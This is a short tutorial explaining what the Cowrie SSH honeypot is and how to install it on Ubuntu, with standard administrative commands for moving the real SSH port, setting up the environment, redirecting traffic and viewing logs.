Hacker attacks have been a problem for a long time. Managing our servers is essential to prevent them from being hacked.
I’ll introduce you to Cowrie SSH, an open-source tool that creates a honeypot to lure hackers into a fake server and protect your real server from damage. You’ll also learn how to set up Cowrie on Ubuntu.
Let’s get started!
Cowrie SHH Overview and Benefits
First of all, let’s understand what a honeypot means. It’s like a baited device connected to the internet, set up for attackers to target specific vulnerabilities. It mimics the kind of devices attackers are after, like web servers.
Cowrie is a honeypot that pretends to be an SSH server with easily crackable login credentials. Its command-line environment is based on Python.
Attackers who log in get access to a simulated Linux shell to run commands and see realistic responses, but the commands don’t work outside of Cowrie’s Python-based sandbox environment. It’s a clever imitation!
You can not only protect your server, but you’ll see the commands the hacker is trying to run. To increase your protection, it’s important to understand what the other party is after. This will help you identify potential risks and take necessary steps to safeguard yourself. It also provides information about the attacker’s geographical IP location. Cowrie stores this information in its logs.
Cowrie Installation on Ubuntu
Before installing Cowrie, we need to change the SSH port 22 to something else. This way, the intruder thinks they are in a real SSH port.
nano /etc/ssh/sshd_config
For example, change the port to 22222.
Restart SSH and check if it is listening to the new port:
sudo systemctl restart ssh netstat -nap | grep 2222
You should see something like this:
tcp 0 0 0.0.0.0:22222 0.0.0.0:* LISTEN 9242/sshd
Now, we’re ready to install Cowrie and its dependencies:
sudo apt-get install git python3-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind virtualenv
Create a new dedicated user for Cowrie:
sudo adduser --disabled-password cowrie su - cowrie
Download the git files for Cowrie:
git clone http://github.com/cowrie/cowrie
Set up a new virtual environment and install the required packages:
cd /home/cowrie/cowrie python -m venv cowrie-env source cowrie-env/bin/activate python -m pip install --upgrade pip python -m pip install --upgrade -r requirements.txt
Cowrie has two config files — cowrie.cfg.dist and cowrie.cfg (this one takes precedence). Upgrades can overwrite the .dist file, but cowrie.cfg remains unchanged.
It’s a good idea to make a copy of the original cowrie.cfg just in case.
Let’s enable telnet in cowrie.cfg , for example, using the Nano editor:
enabled = true
Optionally, you can also change the hostname to something that sounds like an actual hostname to an attacker.
Update the port routing config using theiptables command:
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
We can start Cowrie with this command:
bin/cowrie start
Respectively, we can stop it by executing:
bin/cowrie stop
Now, Cowrie records all attempted commands. We can view the logs in real-time like this:
tail -f log/cowrie.log
Conclusion
In this tutorial, you learned why Cowrie is beneficial and how to install it on Ubuntu. Even with a quick setup, it remains robust, enhancing your exploration of internet attacks.
Keep in mind that honeypots are essentially an open door for attackers. So, it’s essential to exercise caution and clearly understand what you’re doing when running a honeypot.